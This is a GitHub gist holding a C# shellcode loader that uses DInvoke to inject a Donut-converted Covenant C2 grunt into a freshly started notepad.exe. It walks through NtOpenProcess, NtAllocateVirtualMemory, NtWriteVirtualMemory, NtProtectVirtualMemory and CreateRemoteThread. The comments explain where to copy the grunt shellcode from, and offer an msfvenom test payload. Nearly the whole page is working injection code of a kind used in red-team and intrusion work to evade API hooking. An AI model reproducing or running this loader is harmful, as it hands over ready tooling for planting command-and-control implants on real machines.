Skip to content

Instantly share code, notes, and snippets.

@ChoiSG
Last active March 18, 2022 21:01
Embed
What would you like to do?
stage zero using dinvoke to inject donut'ed covenant grunt
using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using DynamicInvoke = DInvoke.DynamicInvoke;
// Install DInvoke, Fody, and Costura Fody through Nuget
namespace stagezero
{
class Program
{
static void Main(string[] args)
{
// Covenant saves base64 shellcode launcher in opt/Covenant/Covenant/Data/Temp/<grunt_profile>.bin.b64
// Simply `xclip -selection c < opt/Covenant/Covenant/Data/Temp/GruntHTTP.bin.b64` and we are good to go!
string gruntx64 = "<your_grunt_base64ed_shellcode>";
// Or you can just use a messagebox shellcode - msfvenom -a x64 --platform windows -p windows/x64/messagebox TEXT="hello world" -f csharp
// or w/e shellcode you like
byte[] sc = Convert.FromBase64String(gruntx64);
var process = Process.Start("C:\\Windows\\System32\\notepad.exe");
var pid = (uint)process.Id;
Console.WriteLine("[+] Notepad pid: " + pid);
IntPtr procHandle = DynamicInvoke.Native.NtOpenProcess(pid, DInvoke.Data.Win32.Kernel32.ProcessAccessFlags.PROCESS_ALL_ACCESS);
Console.WriteLine("[+] NtOpenProcess - Opening notepad processs");
IntPtr baseAddr = IntPtr.Zero;
IntPtr regionSize = (IntPtr)sc.Length;
IntPtr alloc = DynamicInvoke.Native.NtAllocateVirtualMemory(procHandle, ref baseAddr, IntPtr.Zero, ref regionSize, 0x1000 | 0x2000, 0x04);
Console.WriteLine("[+] NtAllocateVirtualMemory - Allocating memory: " + regionSize + " bytes");
uint ntWVMemory = DynamicInvoke.Native.NtWriteVirtualMemory(procHandle, alloc, Marshal.UnsafeAddrOfPinnedArrayElement(sc, 0), (uint)sc.Length);
Console.WriteLine("[+] NtWriteVirtualMemory - Writing shellcode to notepad.exe: 0x" + alloc.ToInt64().ToString("x2"));
var ntPVMemory = DynamicInvoke.Native.NtProtectVirtualMemory(procHandle, ref alloc, ref regionSize, (uint)0x20);
Console.WriteLine("[+] NtProtectVirtualMemory - Changing permission to RX");
var pCreateRemoteThread = DynamicInvoke.Generic.GetLibraryAddress("kernel32.dll", "CreateRemoteThread");
IntPtr threadId = IntPtr.Zero;
var crtResult = DInvoke.DynamicInvoke.Win32.CreateRemoteThread(procHandle, IntPtr.Zero, 0, alloc, IntPtr.Zero, 0, ref threadId);
Console.WriteLine("[+] CreateRemoteThread - Starting shellcode...\n\n");
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment